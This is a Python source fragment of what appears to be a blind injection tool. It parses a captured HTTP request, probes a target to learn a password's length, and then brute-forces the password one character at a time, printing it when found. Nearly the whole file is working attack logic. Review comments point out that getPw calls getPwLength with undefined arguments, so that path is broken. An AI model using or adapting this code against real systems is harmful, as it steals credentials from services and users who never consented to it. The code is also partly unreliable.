def getPwLength(connection):
    """Probe candidate lengths 1..30 and return the first one the target accepts.

    For every candidate a payload from ``buildPayloadForLength`` is sent over
    ``connection``; the first candidate for which ``requestFailed`` reports
    no failure is taken as the length.  Returns -1 when no candidate in the
    range is accepted.  The outcome is printed before returning.
    """
    found = -1
    for candidate in range(1, 31):
        probe = buildPayloadForLength(candidate)
        if requestFailed(probe, connection):
            continue
        chitter.info(" payload: {}".format(probe))
        found = candidate
        break
    print("[+++] password length = {} characters wide.".format(found))
    return found
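def main():
    """Program entry point.

    Prints the banner, parses the command line, loads the request header
    file, builds the include set of request parameters (everything except
    the probed parameter and the excluded ones) and then runs either the
    connection test or the length probe on the established connection.
    The connection is always closed, also when the probe raises.
    """
    chitter.post("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
    chitter.post("")
    chitter.post("{}".format(__banner__))
    chitter.post("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
    chitter.info(__description__)
    chitter.debug("TEST TEST TEST")

    # argument parser
    parser = argparse.ArgumentParser()
    args = initParser(parser)
    chitter.status("parse input parameters")

    # initialization / read in file with headerfield definitions
    chitter.status("read parameters from requestheader file '{}'".format(
        __gHeaderfieldsFile__))
    init()
    __gInputParameters__.update(handleArgs(args))
    updateHeaders(__gInputParameters__['headerfile'])

    # include every request parameter except the probed one and the excluded ones
    for k, v in __gRequestParameters__.items():
        if k != __gXparam__ and k not in __gExclude__:
            __gInclude__[k] = v
    # drop excluded keys that may already have been present; pop() tolerates
    # absent keys, whereas the old del loop stopped at the first missing one
    for x in __gExclude__:
        __gInclude__.pop(x, None)

    connection = connectTarget()
    if connection is None:
        chitter.fatal("Connection could not be established!")
        exit(1)  # a fatal condition must not report success (was exit(0))
    try:
        if __gTestHeader__:
            testConnection(connection)
        else:
            getPwLength(connection)
    finally:
        # dont forget to close the connection, even on an exception
        connection.close()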
def getPw(connection):
    """Reconstruct the password one position at a time over ``connection``.

    First asks ``getPwLength`` for the length, then for every position tries
    the ASCII codes 32..127 with ``buildPayloadForName`` until
    ``requestFailed`` reports no failure.  Prints the result; returns None.
    """
    pw = ""
    c = 32
    # NOTE(review): this call passes three names that are not defined in this
    # scope and does not match the one-argument getPwLength(connection) in this
    # file; as written it raises NameError before anything else runs — confirm
    # the intended signature.
    pwLength = getPwLength(header, inputParameters, requestParameters)
    if pwLength > -1:
        for n in range(1, pwLength + 1):
            c = 32  # immediately overwritten by the loop below
            for c in range(32, 128):
                payload = buildPayloadForName(chr(c), n)
                if not requestFailed(payload, connection):
                    chitter.info(" payload: {}".format(payload))
                    pw += chr(c)
                    chitter.info(" pw={}".format(pw))
                    break
    else:
        print(
            "[-] Password retrievel failed. Password length could not be determined!"
        )
    print("[+++ FOUND +++] password = {}".format(pw))
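def updateHeaders(__headerFile__):
    """Load request header fields from the header file into the module globals.

    Each line is matched against the field names in ``__gHeaderFields__``; a
    matching line stores its value in ``__gHeader__`` (a Cookie value is also
    passed to ``updateCookies``, a Host value sets the ``target`` input
    parameter).  Lines matching no field are parsed as the request line when
    they contain GET or POST, otherwise — for POST requests — as request body
    parameters via ``updateRequestParameters``.  Errors are printed and
    swallowed, so the globals may be only partially populated afterwards.
    """
    try:
        with open(__headerFile__, 'r') as hf:
            chitter.info(" -----------------------------------------")
            chitter.info(" header request fields from header file:")
            for line in hf:
                sline = line.strip("\n")
                fieldFound = False
                for k in __gHeaderFields__:
                    idx = sline.find(k)
                    if idx == -1:
                        continue
                    end = idx + len(k)
                    # Skip a name that is continued by '-' (e.g. 'Accept' vs.
                    # 'Accept-Encoding').  The check is made at the match offset
                    # (the old code indexed at len(k) regardless of where the
                    # name was found) and is bounds-checked, so a line no longer
                    # than the field name no longer raises IndexError.
                    # NOTE(review): find() also matches a name inside a value;
                    # anchoring on the line start may be what is intended.
                    if end < len(sline) and sline[end] == '-':
                        continue
                    v = sline[end:]
                    v = re.sub(r'^[:| #]*', '', v)  # drop leading ':', '|', ' ', '#'
                    __gHeader__.update({k: v})
                    chitter.info("\t {}: {}".format(k, v))
                    if k == 'Cookie':
                        updateCookies(v)
                    if k == 'Host':
                        __gInputParameters__.update({'target': v})
                    fieldFound = True
                    break
                if fieldFound or sline == "":
                    continue
                if sline.find("GET") > -1 or sline.find("POST") > -1:
                    readRequestHeader(line)
                elif __gInputParameters__['method'] == "POST":
                    chitter.info("\t-----------------------------------------")
                    chitter.info("\tPOST request parameters from header file:")
                    updateRequestParameters(sline, "POST")
    except Exception as e:
        # best-effort parse: report and keep whatever was loaded so far
        print("[!!!] Error in updateHeaders()!")
        print(e)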
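def readRequestHeader(line):
    """Parse the request line of the header file and record method and path.

    Expects ``METHOD LOCATION PROTOCOL``.  For GET the query string, if any,
    is handed to ``updateRequestParameters``; for POST the location is taken
    as the path.  Any other method is recorded as an empty method and path
    (the old code left ``path`` unbound and raised NameError in that case).

    Raises:
        ValueError: when the line does not split into exactly three tokens.
    """
    # split() tolerates repeated spaces and drops the trailing newline
    (method, loc, h) = line.split()
    chitter.info("\t[REQUEST] {} {} {}".format(method, loc, h))
    path = ""
    if method not in ("GET", "POST"):
        method = ""
    elif method == "GET":
        if "?" in loc:
            # split on the first '?' only; a query string may contain another
            (path, p) = loc.split("?", 1)
            updateRequestParameters(p, "GET")
        else:
            path = loc  # assuming path without request parameters
            chitter.warn(
                "Did not find any RequestParameters in provided Header")
    else:
        path = loc
    __gInputParameters__.update({'method': method, 'path': path})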
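def testConnection(connection):
    """Send one request built from the module globals and log the response.

    Uses ``__gInputParameters__`` (method, path), ``__gRequestParameters__``
    (url-encoded as the request body) and ``__gHeader__``; logs status,
    response headers and the first 100 bytes of the body.
    """
    body = urllib.parse.urlencode(__gRequestParameters__)
    connection.request(__gInputParameters__['method'],
                       __gInputParameters__['path'], body, __gHeader__)
    resp = connection.getresponse()
    chitter.status("[CONNECTION] {} - {}".format(resp.status, resp.reason))
    # Only a 100-byte prefix is read, so a gzip body is normally truncated;
    # decompression is best-effort and falls back to the raw bytes.  The rest
    # of the body is never consumed — main() closes the connection afterwards.
    data = resp.read(100)
    try:
        data_out = gzip.decompress(data)
    except Exception:  # not gzip or truncated (OSError/EOFError/zlib.error)
        data_out = data
    chitter.info(str(resp.status) + " | " + str(resp.reason))
    chitter.info("RESPONSE HEADERS")
    for key in resp.headers:
        chitter.info("\t" + key + " : " + resp.headers[key])
    chitter.info("BODY:\n\t")
    chitter.info("--------- BODY BEGIN ---------")
    chitter.info(data_out)
    chitter.info("--------- BODY END ---------")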